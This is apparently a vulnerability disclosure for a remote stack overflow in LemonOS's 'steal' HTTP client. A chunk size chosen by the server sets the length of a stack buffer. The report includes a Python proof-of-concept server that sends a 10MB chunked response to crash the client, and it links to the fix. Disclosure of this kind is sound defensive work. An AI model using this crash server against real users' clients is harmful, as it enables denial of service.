Lemon OS | Remote stack overflow
Information
| Software Type | Operating System |
|---|---|
| Software Name | LemonOS |
| Affected Version | nightly-2024-07-12 |
| Software Vendor | LemonOS |
| Software Link | https://github.com/LemonOSProject/LemonOS |
| Severity | High |
| CVSS Score | 7.5 |
| CVE Link | CVE-2025-9001 |
| Affected Assets | 10+ |
| Date of Discovery | April 10th 2025 |
| PoC Exploit | https://github.com/LemonOSProject/LemonOS/issues/60 |
Description
This vulnerability was identified as a result of collaborative efforts between myself and 0xVpr, I identified the vulnerability and 0xVpr mitigated against it by providing a fix.
This report details a stack overflow vulnerability in the steal HTTP client (curl equivalent for LemonOS), identified during an analysis conducted on April 10, 2025. The vulnerability arises from the use of a variable-length array (VLA) in the HTTPGet function, specifically at line 361 of main.cpp, where char recieveBuffer[chunkSize]; is declared.
The chunkSize value is controlled by an external HTTP server response, allowing an attacker to trigger a crash or potentially escalate the impact with precise manipulation.
Reproduce
Download and put the following two files in the same directory:
- https://github.com/LemonOSProject/LemonOS/blob/master/Applications/Steal/main.cpp
- https://github.com/LemonOSProject/LemonOS/blob/master/LibLemon/include/Lemon/Core/URL.h
Compile the code:
g++ -g -o steal main.cpp -lssl -lcrypto
Create a python server that responds with a 10MB data size to any incoming requests:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 80))
s.listen(1)
print("Listening on 127.0.0.1:80")
conn, addr = s.accept()
conn.recv(1024)
response = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
chunk_size = 10485760 # 10MB
payload = b"A" * chunk_size
response += f"{hex(chunk_size)[2:]}".encode() + b"\r\n"
response += payload + b"\r\n"
response += b"0\r\n\r\n"
conn.send(response)
conn.close()
s.close()Ensure Python-3 is installed and then run this:
$ python3 server.pyThink of this as a normal server that makes a 10MB installer available to users when they request it.
Compile the steal binary:
g++ -g -o steal main.cpp -lssl -lcryptoRun it by sending a request to the server with steal binary:
./steal "127.0.0.1"This will trigger a segmentation fault and crashes the program.
For a more extensive & detailed proof of concept, see the issue I opened on Github:
https://github.com/LemonOSProject/LemonOS/issues/60
Mitigation
0xVpr has modified main.cpp and fixed the bug:
https://gist.github.com/0xHamy/f54f672ddf49e41e550350448e4c93a9
You can now run the same attack again and serve a chunk_size of 100MB or 10x the amount we used for our initial tests and you will notice that steal doesn't crash no more.
Proof of Concept (PoC) Video
No PoC video available.
Posted on: May 23, 2025 01:10 AM